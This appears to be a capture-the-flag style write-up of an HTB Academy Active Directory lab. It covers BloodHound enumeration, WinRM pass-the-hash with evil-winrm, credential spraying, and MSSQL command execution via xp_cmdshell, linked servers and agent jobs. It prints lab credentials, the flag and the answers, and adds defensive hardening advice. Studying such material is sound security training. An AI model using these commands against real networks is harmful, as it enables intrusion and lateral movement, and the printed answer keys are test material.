🔐Privileged Access

🎭 HTB Academy: Active Directory Enumeration & Attacks

📍 Overview

Privileged Access represents the lateral movement and privilege expansion phase following domain compromise. After achieving DCSync capabilities and extracting domain credentials, the next step is identifying and exploiting remote access rights across the enterprise. This module covers BloodHound enumeration for privileged access, WinRM/PSRemote exploitation, and SQL Server administrative access abuse.

🔗 Attack Chain Progression

Complete Active Directory Compromise Timeline:

ACL Enumeration → ACL Abuse → DCSync → Privileged Access → Full Infrastructure Control
  (Discovery)    (Exploit)   (Extract)   (Lateral Move)     (Domain Domination)

Prerequisites from Previous Modules:

Domain credentials extracted: Via DCSync attack
Administrative access established: From ACL abuse tactics
Domain understanding achieved: Through enumeration phases

🧠 Privileged Access Concepts

Types of Remote Access Rights

1. WinRM/PSRemote Access

Protocol: Windows Remote Management (WinRM)
Port: 5985 (HTTP), 5986 (HTTPS)
Authentication: Kerberos, NTLM, Basic
Privileges: Allows PowerShell remoting and command execution
Detection: BloodHound :CanPSRemote relationship

2. RDP Access Rights

Protocol: Remote Desktop Protocol (RDP)
Port: 3389 (default)
Requirements: Remote Desktop Users group membership
Usage: Interactive desktop sessions
Detection: BloodHound :CanRDP relationship

3. SQL Server Administrative Access

Service: Microsoft SQL Server
Privileges: sysadmin role membership
Capabilities: Command execution via xp_cmdshell
Common accounts: Service accounts with elevated SQL privileges
Detection: Manual enumeration, credential testing

4. Local Administrator Rights

Scope: Local machine administrative privileges
Methods: Local Administrators group membership
Usage: Full system control, credential extraction
Detection: BloodHound :AdminTo relationship

Why Privileged Access Matters

Lateral Movement: Access additional systems in the domain
Credential Harvesting: Extract credentials from new systems
Persistence: Establish multiple access points
Data Exfiltration: Access sensitive data on various servers
Network Mapping: Understand infrastructure layout
Attack Path Expansion: Find additional privilege escalation opportunities

🩸 BloodHound for Privileged Access Enumeration

SharpHound Data Collection

Complete Domain Enumeration

# Navigate to tools directory
cd C:\Tools\

# Run SharpHound with all collection methods
.\SharpHound.exe

Expected Output:

PS C:\Tools> .\SharpHound.exe

2022-06-20T07:32:05.9292877-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-06-20T07:32:05.9449170-07:00|INFORMATION|Initializing SharpHound at 7:32 AM on 6/20/2022
2022-06-20T07:32:06.4761560-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-06-20T07:32:07.0074141-07:00|INFORMATION|Beginning LDAP search for INLANEFREIGHT.LOCAL
2022-06-20T07:32:37.7261930-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 66 MB RAM
2022-06-20T07:32:55.3199297-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-06-20T07:32:55.3980527-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-06-20T07:33:07.7418424-07:00|INFORMATION|Status: 3793 objects finished (+3793 63.21667)/s -- Using 126 MB RAM
2022-06-20T07:33:14.6481630-07:00|INFORMATION|Consumers finished, closing output channel
2022-06-20T07:33:14.6949636-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-06-20T07:33:14.9761845-07:00|INFORMATION|Status: 3809 objects finished (+16 56.85075)/s -- Using 80 MB RAM
2022-06-20T07:33:14.9761845-07:00|INFORMATION|Enumeration finished in 00:01:07.9744738
2022-06-20T07:33:15.4918222-07:00|INFORMATION|SharpHound Enumeration Completed at 7:33 AM on 6/20/2022! Happy Graphing!

SharpHound Collection Methods

Group: Group membership relationships
LocalAdmin: Local administrator privileges
Session: Active user sessions
Trusts: Domain trust relationships
ACL: Access Control List permissions
Container: OU and container permissions
RDP: Remote Desktop access rights
ObjectProps: Object properties and attributes
DCOM: DCOM execution rights
SPNTargets: Service Principal Names
PSRemote: PowerShell remoting capabilities

BloodHound GUI Analysis

Starting BloodHound

# Navigate to BloodHound directory
cd .\BloodHound-GUI\

# Launch BloodHound
.\BloodHound.exe

Importing SharpHound Data

Click "Upload Data" in BloodHound interface
Select ZIP file ending with "_BloodHound"
Wait for import to complete
Verify data loaded in database

Cypher Queries for Privileged Access

WinRM/PSRemote Access Enumeration

# Find users with PSRemote rights to computers
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) 
MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) 
RETURN p2

RDP Access Rights

# Find users with RDP access to computers
MATCH p=(u:User)-[:CanRDP]->(c:Computer) 
RETURN p

Local Administrator Rights

# Find users with local admin rights
MATCH p=(u:User)-[:AdminTo]->(c:Computer) 
RETURN p

DCOM Execution Rights

# Find users with DCOM execution capabilities
MATCH p=(u:User)-[:ExecuteDCOM]->(c:Computer) 
RETURN p

All High-Privilege Paths

# Find all paths to high-value targets
MATCH p=shortestPath((u:User)-[*1..]->(c:Computer {highvalue:true})) 
RETURN p

💻 WinRM/PSRemote Exploitation

Understanding WinRM Architecture

WinRM Service Components

WS-Management Protocol: Web Services for Management
HTTP/HTTPS Transport: Ports 5985/5986
Authentication Methods: Kerberos, NTLM, Basic, Certificate
PowerShell Remoting: Built on WinRM infrastructure
Security Context: Commands run as authenticated user

WinRM Configuration Requirements

# Check WinRM service status
Get-Service WinRM

# View WinRM configuration
winrm get winrm/config

# Check WinRM listeners
winrm enumerate winrm/config/listener

PSRemote Privilege Verification

Using PowerShell Remoting

# Test WinRM connectivity
Test-WsMan -ComputerName "target-computer"

# Establish PSRemote session
$cred = Get-Credential
Enter-PSSession -ComputerName "target-computer" -Credential $cred

# Execute commands remotely
Invoke-Command -ComputerName "target-computer" -Credential $cred -ScriptBlock {hostname}

Using Evil-WinRM (Linux)

# Install Evil-WinRM
gem install evil-winrm

# Connect to target with credentials
evil-winrm -i 172.16.5.5 -u username -p password

# Connect with hash (Pass-the-Hash)
evil-winrm -i 172.16.5.5 -u username -H NTLM_HASH

Common PSRemote Attack Vectors

1. Credential Spraying

# Test credentials against multiple hosts
$computers = @("host1", "host2", "host3")
$cred = Get-Credential

foreach ($computer in $computers) {
    try {
        Invoke-Command -ComputerName $computer -Credential $cred -ScriptBlock {hostname} -ErrorAction Stop
        Write-Host "Success: $computer" -ForegroundColor Green
    }
    catch {
        Write-Host "Failed: $computer" -ForegroundColor Red
    }
}

2. Pass-the-Hash via WinRM

# Using Evil-WinRM with NTLM hash
evil-winrm -i 172.16.5.5 -u administrator -H 88ad09182de639ccc6579eb0849751cf

3. Golden/Silver Ticket Usage

# Import Golden Ticket and use for WinRM
mimikatz # kerberos::ptt ticket.kirbi
Enter-PSSession -ComputerName "target" -Authentication Kerberos

🗃️ SQL Server Administrative Access

SQL Server Privilege Escalation Overview

SQL Server Roles and Permissions

sysadmin: Full administrative privileges
db_owner: Database ownership privileges
db_ddladmin: DDL administrative privileges
public: Default role for all users
xp_cmdshell: Extended stored procedure for command execution

Common SQL Server Attack Vectors

Default/Weak Credentials: sa account, service accounts
SQL Injection: Application vulnerabilities leading to SQL access
Credential Reuse: Domain credentials with SQL privileges
Service Account Compromise: Kerberoasting SQL service accounts
Linked Server Abuse: Pivoting through SQL server links

SQL Server Enumeration and Exploitation

Using Impacket mssqlclient.py

# Connect with Windows authentication
mssqlclient.py DOMAIN/USERNAME@SQL_SERVER_IP -windows-auth

# Connect with SQL authentication
mssqlclient.py sa@SQL_SERVER_IP

# Connect with hash (Pass-the-Hash)
mssqlclient.py DOMAIN/USERNAME@SQL_SERVER_IP -windows-auth -hashes LM:NTLM

Basic SQL Server Enumeration

-- Check current user and role
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT IS_SRVROLEMEMBER('sysadmin');

-- Enumerate databases
SELECT name FROM sys.databases;

-- Check xp_cmdshell status
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

-- Enumerate linked servers
EXEC sp_linkedservers;

Enabling xp_cmdshell

-- Enable show advanced options
sp_configure 'show advanced options', 1;
RECONFIGURE;

-- Enable xp_cmdshell
sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Command Execution via xp_cmdshell

-- Execute system commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'hostname';
EXEC xp_cmdshell 'dir C:\Users';

-- Read file contents
EXEC xp_cmdshell 'type C:\path\to\file.txt';

-- Network enumeration
EXEC xp_cmdshell 'ipconfig /all';
EXEC xp_cmdshell 'net user';

Advanced SQL Server Exploitation

Linked Server Exploitation

-- Execute commands on linked server
EXEC ('xp_cmdshell ''whoami''') AT [LinkedServerName];

-- Double-hop through multiple linked servers
EXEC ('EXEC (''xp_cmdshell ''''whoami''''''') AT [SecondServer]') AT [FirstServer];

SQL Server Agent Jobs

-- Create malicious job (requires sysadmin)
USE msdb;
EXEC dbo.sp_add_job @job_name = 'Evil Job';
EXEC dbo.sp_add_jobstep 
    @job_name = 'Evil Job',
    @step_name = 'Evil Step',
    @command = 'whoami > C:\temp\output.txt',
    @subsystem = 'CmdExec';
EXEC dbo.sp_start_job @job_name = 'Evil Job';

CLR Integration Abuse

-- Enable CLR integration (requires sysadmin)
sp_configure 'clr enabled', 1;
RECONFIGURE;

-- Create and execute CLR assembly for advanced payloads
-- (Complex technique requiring custom CLR code)

🎯 HTB Academy Lab Solutions

Lab Environment Details

Target IP: 10.129.149.107
RDP Credentials: htb-student:Academy_student_AD!
Linux Attack Host: 172.16.5.225 (SSH: htb-student:HTB_@cademy_stdnt!)

🔍 Question 1: "What other user in the domain has CanPSRemote rights to a host?"

Solution Steps:

1. RDP Connection:

xfreerdp /v:10.129.149.107 /u:htb-student /p:Academy_student_AD!
# Click "OK" on Computer Access Policy prompt
# Close Server Manager
# Run PowerShell as Administrator

2. SharpHound Data Collection:

# Navigate to tools directory
cd C:\Tools\

# Run SharpHound to collect domain data
.\SharpHound.exe

Real Lab Output:

PS C:\Tools> .\SharpHound.exe

2022-06-20T07:32:05.9292877-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-06-20T07:32:05.9449170-07:00|INFORMATION|Initializing SharpHound at 7:32 AM on 6/20/2022
2022-06-20T07:32:06.4761560-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-06-20T07:32:07.0074141-07:00|INFORMATION|Beginning LDAP search for INLANEFREIGHT.LOCAL
2022-06-20T07:32:37.7261930-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 66 MB RAM
2022-06-20T07:32:55.3199297-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-06-20T07:32:55.3980527-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-06-20T07:33:07.7418424-07:00|INFORMATION|Status: 3793 objects finished (+3793 63.21667)/s -- Using 126 MB RAM
2022-06-20T07:33:14.6481630-07:00|INFORMATION|Consumers finished, closing output channel
2022-06-20T07:33:14.6949636-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-06-20T07:33:14.9761845-07:00|INFORMATION|Status: 3809 objects finished (+16 56.85075)/s -- Using 80 MB RAM
2022-06-20T07:33:14.9761845-07:00|INFORMATION|Enumeration finished in 00:01:07.9744738
2022-06-20T07:33:15.4918222-07:00|INFORMATION|SharpHound Enumeration Completed at 7:33 AM on 6/20/2022! Happy Graphing!

3. BloodHound Analysis:

# Navigate to BloodHound directory
cd .\BloodHound-GUI\

# Launch BloodHound
.\BloodHound.exe

4. Data Import and Query:

Upload Data: Click "Upload Data" and select the generated ZIP file
Wait for Import: Allow BloodHound to process the data
Execute Cypher Query:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) 
MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) 
RETURN p2

Lab Result: The query reveals that bdavis has CanPSRemote rights to a host.

🎯 Answer: bdavis

💻 Question 2: "What host can this user access via WinRM? (just the computer name)"

Solution Steps:

Using the same BloodHound session and Cypher query from Question 1:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) 
MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) 
RETURN p2

Analysis: Examining the graph visualization or query results shows that bdavis has CanPSRemote access to ACADEMY-EA-DC01.

🎯 Answer: ACADEMY-EA-DC01

🗃️ Question 3: "Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt."

Solution Steps:

1. SSH to Linux Attack Host:

# From Windows RDP session, open Command Prompt
ssh htb-student@172.16.5.225
# When prompted for password: HTB_@cademy_stdnt!

Real Lab Output:

C:\Users\htb-student>ssh htb-student@172.16.5.225

The authenticity of host '172.16.5.225 (172.16.5.225)' can't be established.
ECDSA key fingerprint is SHA256:BG+VzltzkKbaMbC5FR8GU9x0pcbUBhct6AGrnjH/CHg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.16.5.225' (ECDSA) to the list of known hosts.
htb-student@172.16.5.225's password:

Linux ea-attack01 5.15.0-15parrot1-amd64 #1 SMP Debian 5.15.15-15parrot2 (2022-02-15) x86_64
 ____                      _     ____
|  _ \ __ _ _ __ _ __ ___ | |_  / ___|  ___  ___
| |_) / _` | '__| '__/ _ \| __| \___ \ / _ \/ __|
|  __/ (_| | |  | | | (_) | |_   ___) |  __/ (__
|_|   \__,_|_|  |_|  \___/ \__| |____/ \___|\___|

<SNIP>

┌─[htb-student@ea-attack01]─[~]
└──╼ $

2. SQL Server Authentication:

# Connect to ACADEMY-EA-DB01 using Windows authentication
mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
# When prompted for password: SQL1234!

Real Lab Output:

┌─[htb-student@ea-attack01]─[~]
└──╼ $mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:SQL1234!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server   (140 3232)
[!] Press help for extra shell commands
SQL>

3. Enable xp_cmdshell and Execute Commands:

-- Enable xp_cmdshell (using built-in mssqlclient command)
SQL> enable_xp_cmdshell

-- Read the flag file
SQL> xp_cmdshell type C:\\Users\\damundsen\\Desktop\\flag.txt

Real Lab Output:

SQL> enable_xp_cmdshell

[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ACADEMY-EA-DB01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL> xp_cmdshell type C:\\Users\\damundsen\\Desktop\\flag.txt

output
--------------------------------------------------------------------------------
1m_the_sQl_@dm1n_n0w!

SQL>

🎯 Answer: 1m_the_sQl_@dm1n_n0w!

📋 HTB Academy Lab Summary

Verified Lab Answers:

User with CanPSRemote rights: bdavis
Host accessible via WinRM: ACADEMY-EA-DC01
Flag contents: 1m_the_sQl_@dm1n_n0w!

Key Lab Techniques:

SharpHound data collection for comprehensive domain enumeration
BloodHound Cypher queries for privileged access discovery
mssqlclient.py Windows authentication for SQL Server access
xp_cmdshell command execution for system-level access

Attack Chain Demonstrated:

Domain Compromise → BloodHound Enumeration → Privileged Access Discovery → Lateral Movement

🛡️ Detection and Defensive Measures

WinRM/PSRemote Detection

Event Monitoring

# Key Event IDs for WinRM activity:
# 4624 - Account logon (Type 3 - Network logon for WinRM)
# 4625 - Failed logon attempts
# 400 - WinRM service events
# 6 - WSMan session creation

# Monitor WinRM logons
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$_.Properties[8].Value -eq 3 -and $_.Properties[18].Value -like "*WinRM*"}

PowerShell Logging

# Enable PowerShell script block logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

# Enable PowerShell transcription
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value 1

SQL Server Security Hardening

xp_cmdshell Disable

-- Disable xp_cmdshell
sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- Hide advanced options
sp_configure 'show advanced options', 0;
RECONFIGURE;

SQL Server Monitoring

-- Monitor sysadmin role membership
SELECT p.name, p.type_desc, r.role_principal_id, r.member_principal_id
FROM sys.server_principals p
JOIN sys.server_role_members r ON p.principal_id = r.role_principal_id
WHERE p.name = 'sysadmin';

-- Audit xp_cmdshell usage
-- Enable SQL Server Audit for EXECUTE events on xp_cmdshell

General Defensive Recommendations

1. Privileged Access Management (PAM)

# Implement Just-In-Time (JIT) access
# Use Azure AD Privileged Identity Management
# Deploy Privileged Access Workstations (PAWs)
# Regular access reviews and certification

2. Network Segmentation

# Segment administrative systems
# Implement jump servers/bastion hosts
# Use micro-segmentation for critical services
# Deploy network access control (NAC)

3. Monitoring and Detection

# Deploy SIEM for centralized logging
# Implement User and Entity Behavior Analytics (UEBA)
# Monitor privileged account usage
# Deploy endpoint detection and response (EDR)

4. Regular Security Assessments

# Quarterly BloodHound assessments
# Regular penetration testing
# Privileged account audits
# Security configuration reviews

🚀 Advanced Privileged Access Techniques

BloodHound Advanced Queries

Complex Attack Path Discovery

// Find shortest paths from owned users to Domain Admins
MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.COM"}))
RETURN p

// Find computers where Domain Users have local admin
MATCH p=(g:Group {name:"DOMAIN USERS@DOMAIN.COM"})-[:AdminTo]->(c:Computer)
RETURN p

// Find all users with DCSync privileges
MATCH p=(u:User)-[:DCSync]->(d:Domain)
RETURN p

// Find kerberoastable users with admin rights
MATCH p=(u:User {hasspn:true})-[:AdminTo]->(c:Computer)
RETURN p

Privileged Service Account Discovery

// Find service accounts with high privileges
MATCH p=(u:User)-[:MemberOf*1..]->(g:Group)
WHERE u.serviceprincipalnames IS NOT NULL
AND (g.name =~ ".*ADMIN.*" OR g.highvalue = true)
RETURN p

// Find accounts with unusual privilege combinations
MATCH p=(u:User)-[:CanRDP|:CanPSRemote|:ExecuteDCOM|:AdminTo*1..]->(c:Computer)
WHERE NOT u.name =~ ".*\\$$"
RETURN p

Automated Privilege Escalation

PowerShell Empire Integration

# Use Empire for automated lateral movement
# Deploy agents through WinRM access
# Leverage SQL Server access for persistence
# Chain multiple privilege escalation vectors

Cobalt Strike Integration

# Use Beacon for persistent access
# Leverage WinRM for lateral movement
# Deploy SQL Server agents for data exfiltration
# Implement advanced evasion techniques

Cross-Platform Attack Chaining

Linux to Windows Pivoting

# Use Linux attack host for initial access
# Leverage mssqlclient.py for SQL Server access
# Chain to PowerShell remoting via WinRM
# Extract additional credentials for further access

Multi-Domain Exploitation

# Identify trust relationships
# Leverage cross-domain privileges
# Abuse transitive trust relationships
# Establish persistence across domains

📊 Key Takeaways

Technical Mastery Achieved

BloodHound Proficiency: Advanced Cypher queries for privilege discovery
WinRM Exploitation: Multiple methods for PowerShell remoting abuse
SQL Server Compromise: Complete administrative access via xp_cmdshell
Lateral Movement: Systematic approach to expanding domain access

Professional Skills Developed

Graph Database Analysis: Understanding relationship-based attack paths
Multi-Platform Operations: Seamless Linux/Windows tool integration
Service-Specific Exploitation: SQL Server administrative abuse
Detection Awareness: Understanding defensive signatures and countermeasures

Attack Chain Mastery

Credential Extraction → Privilege Mapping → Lateral Movement → Data Exfiltration
   (DCSync Results)     (BloodHound)      (WinRM/SQL)       (Flag Capture)

Defensive Insights

Monitoring Requirements: WinRM, SQL Server, and privileged account activity
Preventive Measures: Service hardening, privilege minimization, network segmentation
Detection Strategies: Behavioral analysis, unusual authentication patterns
Response Procedures: Incident containment for privileged access abuse

🔑 Complete lateral movement and privilege expansion mastery achieved - from domain compromise through privileged access discovery to multi-service exploitation - representing advanced Active Directory penetration testing capabilities for enterprise environments!

PreviousDCSync Attack NextKerberos "Double Hop" Problem

Last updated 3 months ago